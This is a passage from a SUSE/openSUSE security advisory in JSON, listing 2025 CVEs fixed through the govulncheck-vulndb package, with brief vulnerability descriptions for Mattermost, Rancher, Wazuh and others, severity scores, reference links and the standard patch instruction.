"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-1243"
},
{
"cve": "CVE-2025-1293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-1293"
}
],
"notes": [
{
"category": "general",
"text": "Hermes versions up to 0.4.0 improperly validated the JWT provided when using the AWS ALB authentication mode, potentially allowing for authentication bypass. This vulnerability, CVE-2025-1293, was fixed in Hermes 0.5.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-1293",
"url": "https://www.suse.com/security/cve/CVE-2025-1293"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-1293"
},
{
"cve": "CVE-2025-1412",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-1412"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 9.11.x \u003c= 9.11.6, 10.4.x \u003c= 10.4.1 fail to invalidate all active sessions when converting a user to a bot, with allows the converted user to escalate their privileges depending on the permissions granted to the bot.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-1412",
"url": "https://www.suse.com/security/cve/CVE-2025-1412"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-1412"
},
{
"cve": "CVE-2025-20051",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-20051"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.4.x \u003c= 10.4.1, 9.11.x \u003c= 9.11.7, 10.3.x \u003c= 10.3.2, 10.2.x \u003c= 10.2.2 fail to properly validate input when patching and duplicating a board, which allows a user to read any arbitrary file on the system via duplicating a specially crafted block in Boards.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-20051",
"url": "https://www.suse.com/security/cve/CVE-2025-20051"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-20051"
},
{
"cve": "CVE-2025-22870",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22870"
}
],
"notes": [
{
"category": "general",
"text": "Matching of hosts against proxy patterns can improperly treat an IPv6 zone ID as a hostname component. For example, when the NO_PROXY environment variable is set to \"*.example.com\", a request to \"[::1%25.example.com]:80` will incorrectly match and not be proxied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22870",
"url": "https://www.suse.com/security/cve/CVE-2025-22870"
},
{
"category": "external",
"summary": "SUSE Bug 1238572 for CVE-2025-22870",
"url": "https://bugzilla.suse.com/1238572"
},
{
"category": "external",
"summary": "SUSE Bug 1238611 for CVE-2025-22870",
"url": "https://bugzilla.suse.com/1238611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-22870"
},
{
"cve": "CVE-2025-22952",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22952"
}
],
"notes": [
{
"category": "general",
"text": "elestio memos v0.23.0 is vulnerable to Server-Side Request Forgery (SSRF) due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22952",
"url": "https://www.suse.com/security/cve/CVE-2025-22952"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-22952"
},
{
"cve": "CVE-2025-23387",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-23387"
}
],
"notes": [
{
"category": "general",
"text": "A Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allowed unauthenticated users to list all CLI authentication tokens and delete them before the CLI is able to get the token value.This issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-23387",
"url": "https://www.suse.com/security/cve/CVE-2025-23387"
},
{
"category": "external",
"summary": "SUSE Bug 1236656 for CVE-2025-23387",
"url": "https://bugzilla.suse.com/1236656"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-23387"
},
{
"cve": "CVE-2025-23388",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-23388"
}
],
"notes": [
{
"category": "general",
"text": "A Stack-based Buffer Overflow vulnerability in SUSE rancher allows for denial of service.This issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-23388",
"url": "https://www.suse.com/security/cve/CVE-2025-23388"
},
{
"category": "external",
"summary": "SUSE Bug 1236668 for CVE-2025-23388",
"url": "https://bugzilla.suse.com/1236668"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-23388"
},
{
"cve": "CVE-2025-23389",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-23389"
}
],
"notes": [
{
"category": "general",
"text": "A Improper Access Control vulnerability in SUSE rancher allows a local user to impersonate other identities through SAML Authentication on first login.\nThis issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-23389",
"url": "https://www.suse.com/security/cve/CVE-2025-23389"
},
{
"category": "external",
"summary": "SUSE Bug 1236780 for CVE-2025-23389",
"url": "https://bugzilla.suse.com/1236780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-23389"
},
{
"cve": "CVE-2025-24016",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-24016"
}
],
"notes": [
{
"category": "general",
"text": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-24016",
"url": "https://www.suse.com/security/cve/CVE-2025-24016"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-24016"
},
{
"cve": "CVE-2025-24526",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-24526"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.1.x \u003c= 10.1.3, 10.4.x \u003c= 10.4.1, 9.11.x \u003c= 9.11.7, 10.3.x \u003c= 10.3.2, 10.2.x \u003c= 10.2.2 fail to restrict channel export of archived channels when the \"Allow users to view archived channels\" is disabled which allows a user to export channel contents when they shouldn\u0027t have access to it",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-24526",
"url": "https://www.suse.com/security/cve/CVE-2025-24526"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-24526"
},
{
"cve": "CVE-2025-24806",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-24806"
}
],
"notes": [
{
"category": "general",
"text": "Authelia is an open-source authentication and authorization server providing two-factor authentication and single sign-on (SSO) for applications via a web portal. If users are allowed to sign in via both username and email the regulation system treats these as separate login events. This leads to the regulation limitations being effectively doubled assuming an attacker using brute-force to find a user password. It\u0027s important to note that due to the effective operation of regulation where no user-facing sign of their regulation ban being visible either via timing or via API responses, it\u0027s effectively impossible to determine if a failure occurs due to a bad username password combination, or a effective ban blocking the attempt which heavily mitigates any form of brute-force. This occurs because the records and counting process for this system uses the method utilized for sign in rather than the effective username attribute. This has a minimal impact on account security, this impact is increased naturally in scenarios when there is no two-factor authentication required and weak passwords are used. This makes it a bit easier to brute-force a password. A patch for this issue has been applied to versions 4.38.19, and 4.39.0. Users are advised to upgrade. Users unable to upgrade should 1. Not heavily modify the default settings in a way that ends up with shorter or less frequent regulation bans. The default settings effectively mitigate any potential for this issue to be exploited. and 2. Disable the ability for users to login via an email address.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-24806",
"url": "https://www.suse.com/security/cve/CVE-2025-24806"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-24806"
},
{
"cve": "CVE-2025-24976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-24976"
}
],
"notes": [
{
"category": "general",
"text": "Distribution is a toolkit to pack, ship, store, and deliver container content. Systems running registry versions 3.0.0-beta.1 through 3.0.0-rc.2 with token authentication enabled may be vulnerable to an issue in which token authentication allows an attacker to inject an untrusted signing key in a JSON web token (JWT). The issue lies in how the JSON web key (JWK) verification is performed. When a JWT contains a JWK header without a certificate chain, the code only checks if the KeyID (`kid`) matches one of the trusted keys, but doesn\u0027t verify that the actual key material matches. A fix for the issue is available at commit 5ea9aa028db65ca5665f6af2c20ecf9dc34e5fcd and expected to be a part of version 3.0.0-rc.3. There is no way to work around this issue without patching if the system requires token authentication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-24976",
"url": "https://www.suse.com/security/cve/CVE-2025-24976"
},
{
"category": "external",
"summary": "SUSE Bug 1237074 for CVE-2025-24976",
"url": "https://bugzilla.suse.com/1237074"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-24976"
},
{
"cve": "CVE-2025-25196",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-25196"
}
],
"notes": [
{
"category": "general",
"text": "OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. OpenFGA \u003c v1.8.4 (Helm chart \u003c openfga-0.2.22, docker \u003c v.1.8.4) are vulnerable to authorization bypass when certain Check and ListObject calls are executed. Users on OpenFGA v1.8.4 or previous, specifically under the following conditions are affected by this authorization bypass vulnerability: 1. Calling Check API or ListObjects with a model that has a relation directly assignable to both public access AND userset with the same type. 2. A type bound public access tuple is assigned to an object. 3. userset tuple is not assigned to the same object. and 4. Check request\u0027s user field is a userset that has the same type as the type bound public access tuple\u0027s user type. Users are advised to upgrade to v1.8.5 which is backwards compatible. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-25196",
"url": "https://www.suse.com/security/cve/CVE-2025-25196"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-25196"
},
{
"cve": "CVE-2025-25199",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-25199"
}
],
"notes": [
{
"category": "general",
"text": "go-crypto-winnative Go crypto backend for Windows using Cryptography API: Next Generation (CNG). Prior to commit f49c8e1379ea4b147d5bff1b3be5b0ff45792e41, calls to `cng.TLS1PRF` don\u0027t release the key handle, producing a small memory leak every time. Commit f49c8e1379ea4b147d5bff1b3be5b0ff45792e41 contains a fix for the issue. The fix is included in versions 1.23.6-2 and 1.22.12-2 of the Microsoft build of go, as well as in the pseudoversion 0.0.0-20250211154640-f49c8e1379ea of the `github.com/microsoft/go-crypto-winnative` Go package.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-25199",
"url": "https://www.suse.com/security/cve/CVE-2025-25199"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-25199"
},
{
"cve": "CVE-2025-25204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-25204"
}
],
"notes": [
{
"category": "general",
"text": "`gh` is GitHub\u0027s official command line tool. Starting in version 2.49.0 and prior to version 2.67.0, under certain conditions, a bug in GitHub\u0027s Artifact Attestation cli tool `gh attestation verify` causes it to return a zero exit status when no attestations are present. This behavior is incorrect: When no attestations are present, `gh attestation verify` should return a non-zero exit status code, thereby signaling verification failure. An attacker can abuse this flaw to, for example, deploy malicious artifacts in any system that uses `gh attestation verify`\u0027s exit codes to gatekeep deployments. Users are advised to update `gh` to patched version `v2.67.0` as soon as possible.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-25204",
"url": "https://www.suse.com/security/cve/CVE-2025-25204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-25204"
},
{
"cve": "CVE-2025-25279",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-25279"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.4.x \u003c= 10.4.1, 9.11.x \u003c= 9.11.7, 10.3.x \u003c= 10.3.2, 10.2.x \u003c= 10.2.2 fail to properly validate board blocks when importing boards which allows an attacker could read any arbitrary file on the system via importing and exporting a specially crafted import archive in Boards.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
